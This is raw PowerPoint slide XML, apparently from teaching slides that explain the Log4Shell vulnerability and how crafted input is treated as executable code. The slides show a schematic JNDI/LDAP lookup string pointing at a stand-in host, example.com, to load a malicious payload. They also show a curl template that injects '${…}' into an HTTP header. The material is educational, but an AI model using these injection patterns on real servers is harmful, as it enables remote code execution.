                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{268DE957-52A5-CB98-65E0-7527DC849F35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3309461" y="4049041"/>
            <a:ext cx="3508714" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>JNDI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://example.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malicious_code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="E3116C"/>
              </a:solidFill>
              <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{742069E0-910B-1C76-6551-100415C64435}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3008818" y="4718296"/>
            <a:ext cx="4606527"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BA586F3-CAE9-7C62-A934-6AC45ECE176B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1720938" y="5185622"/>
            <a:ext cx="8274551" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t>lookup through LDAP protocol and loads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malicious_payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t> from the URL example.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="212019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37C8-CDBE-B05D-E2AC-FB6AF60DB490}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>3. Attackers need to invoke a malicious payload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C89ECC1F-0F8A-9730-15FF-596ABA9AD629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Attackers may use various triggers to execute the payload at a specific time or under specific conditions. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>aka. Payload Execution Triggers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Triggers can be based on user interactions, system events, or predefined schedules.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Log4JShell attack is based on user interactions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>requires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>crafting specific input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>to invoke a malicious payload remotely </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1195303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0D5B3-04DE-8F05-439B-356D921EBC80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Introduction to Log4Shell vulnerability &amp; attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96AAD49D-2A3D-585D-8A28-852C6CBD72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8865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7F6B4-DC59-1555-6D41-8BA8C4CDF0DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="85550" y="4001294"/>
            <a:ext cx="1291291" cy="715474"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE56A390-19A0-E347-C869-2AD181415A34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What is special about the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>crafted input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>to a program by attackers?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{321640E4-2D31-FB06-8F47-AD0DA7291579}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Program Treatment of User Input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>When users interact with the program by entering information in a string format (e.g., text, numbers, or commands), the program processes and uses that input as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> to perform specific tasks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Cheating the Program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Attackers aim to manipulate the program's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>behavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> by making it believe that the user-provided </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>crafted input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>) is actually a piece of "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>executable code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>" or commands that should be run by the program. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="String - Free construction and tools icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59D3E62-378F-97AC-159E-4410C116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362" y="1124501"/>
            <a:ext cx="842108" cy="842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A9E371-8F82-CE30-220D-67D362258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394" y="972920"/>
            <a:ext cx="1952648" cy="12440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Equal Sign Means Relationship, Not Action - KP® Mathematics : KP®  Mathematics">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F2854EA-A251-66BE-B270-5F189315A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9096" y="1495344"/>
            <a:ext cx="574540" cy="3906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uestion mark - Free interface icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A787BE7C-DAD5-C351-ACD7-CF831FCD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7432" y="987725"/>
            <a:ext cx="516204" cy="51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24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24C7-626E-0FC9-0857-74E6C734CEDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>An input pattern to invoke malicious payload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C419B23-DE17-334B-7E88-8FD6D5E5229C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2096476" y="4080023"/>
            <a:ext cx="6492632" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="393A34"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" err="1">
                <a:solidFill>
                  <a:srgbClr val="36ACAA"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="393A34"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -H </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>para</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: ${…}'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6052CCF-E095-ECB0-7A66-070C5A52BBB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2018323" y="5080657"/>
            <a:ext cx="1990969" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>command-line tool for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>making HTTP requests</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D45D8E3C-0F82-9AD4-0DBB-7815D237BAB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2389552" y="4372051"/>
            <a:ext cx="85969" cy="708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564524-A32E-7E6C-35D3-E16DAA87D4FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4837721" y="5399414"/>
            <a:ext cx="2359027" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>header parameter. e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>User-Agent, Cookies, X-Api-Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Arrow Connector 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C790502C-34A4-2ADA-6F91-F337DA3AABEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5617737" y="4630154"/>
            <a:ext cx="320919" cy="71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1187A1-F1E9-F1A4-F3EB-299A4968037D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="852241" y="2140670"/>
            <a:ext cx="10329985" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>A string pattern to invoke a malicious payload with HTTP request: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>assigns a string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>${…} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>to a “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>para</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>” , where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>para</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> is a parameter of an HTTP request header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE4E3A7D-8A9F-EB52-1DB8-3FFB3C8BC883}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6525962" y="2914789"/>
            <a:ext cx="1879601" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="E3116C"/>
                </a:solidFill>
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> access a malicious payload hosted in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LDAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B246AB5C-852C-EC61-43A8-0866142760EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7332295" y="3701251"/>
            <a:ext cx="76204" cy="3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D2A13F-EA4A-668C-A779-B4166BE44E3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2943843" y="3034887"/>
            <a:ext cx="969106" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>HTTP request</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Arrow Connector 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19141EF8-349D-8905-903D-FDEF334070A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="18" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3428396" y="3681218"/>
            <a:ext cx="398584" cy="381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157EF8-8FE6-3AC5-3D71-9BE38A7A6A18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267933" y="2938080"/>
            <a:ext cx="969106" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>request header</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Straight Arrow Connector 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9E52C2A-4971-D11D-3BD6-E62CC364FFF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4654057" y="3654341"/>
            <a:ext cx="183664" cy="3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FE1C97-2150-6767-2064-D486D09EA6D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7332295" y="4799250"/>
            <a:ext cx="2851151" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
